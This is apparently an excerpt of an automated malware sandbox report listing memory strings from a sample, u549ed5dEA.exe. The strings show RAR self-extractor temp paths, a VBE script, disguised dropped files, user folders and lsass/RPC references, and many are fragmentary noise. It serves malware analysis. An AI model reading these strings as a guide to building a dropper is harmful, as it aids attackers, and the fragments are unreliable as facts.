                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\volume{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}\memstr_9e939c1f-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivebmemstr_280599ff-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .onedrivememstr_70059d58-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\x1dw(mmemstr_5ad2a6d8-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1(zizmemstr_2c1597c9-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(ziz.memstr_c39a7937-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(ziz.2memstr_af915b48-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1(fmemstr_8be9ee87-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(zcz.memstr_86401b79-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(zcz.\memstr_9fed4641-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t?tempmemstr_60ae167d-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}memstr_de65f725-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .}$pymemstr_631bc4a3-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @6|l(memstr_0e012fe5-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %)yaimemstr_fe768864-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aboutmemstr_20861de7-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blankmemstr_947f746e-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dummymemstr_627e0a07-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntfslmemstr_64a8d3a8-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .vbeomemstr_2bc42ba5-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntfsmmemstr_e54a7716-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nc`%&memstr_28f90efa-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fat32memstr_e78209cd-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ncalrpcmemstr_48c49800-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lsasspirpcomemstr_59fe601e-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lsasspirpcgmemstr_3da0c326-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parentfoldermemstr_fa6daff5-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\userssmemstr_c16218f3-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: image/bmpmemstr_c4cf36d8-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: richedit20a?memstr_359e89f7-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: epmapper3memstr_6cbadfa3-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 910646memstr_972f23c4-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: epmappermemstr_e139ef22-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: setup.exe,0memstr_70515188-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0memstr_f7aea79d-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: itdo.vbememstr_4758cc22-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yn5 itdo.vbebmemstr_3be4e850-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.memstr_6fe731fc-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz. memstr_6ba87e02-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .iitdo.vbememstr_168d9005-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\onecorecommonproxystub.dll[memstr_068ed077-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\onecorecommonproxystub.dllhmemstr_18c8db34-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0ememstr_c80db473-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kaje~1.docmemstr_0c71c1e6-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 kaje~1.docdmemstr_3e45af98-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.ymemstr_0f5a5555-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kaje.docxmemstr_b7621de2-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xfer.dasmemstr_486ffb5f-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 xfer.dasbmemstr_fc5563bb-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.jmemstr_75c884b1-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0i)memstr_38b9fe8a-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avqj.mp2memstr_67b59d9f-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avqj.mp2bmemstr_b3e3a6dd-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(ziz.memstr_a07a2de7-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(ziz.!memstr_8321c4e8-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p{fdd39ad0-238f-46af-adb4-6c85480369c7}f03memstr_d3b9b07d-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oxtra.xlmemstr_c01cf547-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 oxtra.xlbmemstr_4f0a270a-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.mmemstr_dc79c525-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wdsw.bmpmemstr_8ffd774d-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 wdsw.bmpbmemstr_0f30442d-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.vmemstr_7546e8b7-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hbeol.xlsmemstr_d99c851a-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 hbeol.xlsdmemstr_04937a7e-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\onecorecommonproxystub.dllmemstr_322ad392-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menumemstr_78ff5f3c-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\onecorecommonproxystub.dllmemstr_26d3d68b-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows.foundation.propertyvaluememstr_b4242d6d-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yn5 itmemstr_ccd0cf52-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows.storage.streams.datawriterbmemstr_4645e1b1-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fn hbeol.xlsdmemstr_47a72013-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: icusk.pdfmemstr_2569f76a-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 icusk.pdfdmemstr_15226c18-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.imemstr_26a47444-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iomkk.dllmemstr_0f0f6456-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 iomkk.dlldmemstr_ce88d41d-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0-memstr_12d3fcbc-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: orecommonproxystub.dll:memstr_742ae2d4-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx07memstr_f2c03787-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s-1-5-21-2246122658-3693405117-2476756634-1003memstr_04f71152-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsmemstr_8cc85e1e-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsdmemstr_541ceca1-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .documentsmemstr_3346e671-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesmemstr_9f24f2dd-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesbmemstr_0158adc6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .picturesmemstr_099321f0-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{4234d49b-0245-4df3-b780-3893943456e1}memstr_c5f93d6e-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favoritesmemstr_4bbaea2d-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favoritesdmemstr_b015d555-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .favoritesmemstr_c2ae8053-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6122658-3693405117-2476756634-1003memstr_701d5e64-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &pg[cmemstr_9a1311ae-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )8ew`qlmemstr_6d29e60d-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "msdwmemstr_2910026e-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"a6pmemstr_c2e3f38f-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-pc\usernegotiatememstr_953372fc-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: negoextenderkerberosmemstr_7d0ad819-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tssspmemstr_178f173a-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pku2uschannelmemstr_558d633f-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_koeugw_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\cccoma_x64fre_en-gb_dv9udfmemstr_5a4be802-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1dwslmemstr_0e06628a-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatamemstr_ac571811-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatatmemstr_3fb997ce-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.memstr_5322d24c-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.bmemstr_5dd8ff3e-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdgappdatabp1(z[zmemstr_ffabba1b-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localmemstr_15a89719-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local<memstr_1cb0871c-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.vmemstr_9b2aaf46-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n1(z`zmemstr_a129ca5e-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temp:memstr_560f167b-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(zcz.memstr_a556b748-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(zcz.\memstr_03d270ef-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t?tempmemstr_cb64c436-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\\windows.staterepositoryps.dllmemstr_96f9b2d3-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alfons-pcmemstr_ad147a7f-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 192.168.2.5memstr_2c543dcd-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.staterepositoryps.dllmemstr_9be652ab-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pce `j&memstr_59bf4e33-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64\\windows.staterepositoryps.dll&memstr_1a04cf90-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (~/1qmemstr_c24eabdb-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]/qnnmemstr_385c80c5-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file system bind dataht(%memstr_5b8c75d8-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3vbe=memstr_87540c5f-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft corporation4memstr_0f580a98-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: marshalbyvaluevaluesetmemstr_aa422741-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: staterepositorymemstr_df2084b1-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o|nt corpmemstr_111a3dae-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: atx@~nmemstr_95928179-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\@memstr_eb3551f7-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (~/14memstr_c6e54f3b-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psfactorybuffer}memstr_0ec6f867-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psfactorybuffermemstr_9cbc833a-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: immersive shell*memstr_92802bfb-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8wekyb3d8bbwe/memstr_b98e0eb3-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft-edgememstr_ab28fbd0-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psfactorybufferomemstr_a8e6cd7a-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-pc\usermemstr_339bef0c-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: useruserusermemstr_c7dfb0a5-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bb+ncalrpc:[ole04df3000f266993954b7bac3a718]memstr_2e6b8c28-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\systemwdtpwdtpwdtponswdtpwdtpwdtpmemstr_8d81d001-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e-0x0-3$@<memstr_d5ac3052-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\p1memstr_0a60f509-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersmemstr_1149b671-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users<memstr_7ac26883-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usersmemstr_07e15dbe-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alfonsmemstr_f39ac8c1-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user>memstr_9d452e20-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_c61703e9-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1dwslmemstr_de76ad20-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_cdb35407-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdgappdatamemstr_66c70840-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p1(z[zmemstr_b605220e-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0memstr_f2632f98-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,\z_}_mew;ymemstr_0d53e952-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file0memstr_1b9a2e87-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programmemstr_33e21017-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicememstr_24d7b4a2-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturememstr_3c082fd3-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 30570memstr_7453c659-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -2163memstr_a2213c5a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lch4'memstr_028be3eb-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rp(a4$'memstr_f51dc62f-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saved gamesmemstr_c8fb4abd-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saved gameshmemstr_ac04c681-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .saved gamesmemstr_b2cab35a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_browsememstr_1aa53a06-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}rmemstr_e28b8474-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}memstr_abceaa86-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.jspmemstr_3def5818-e
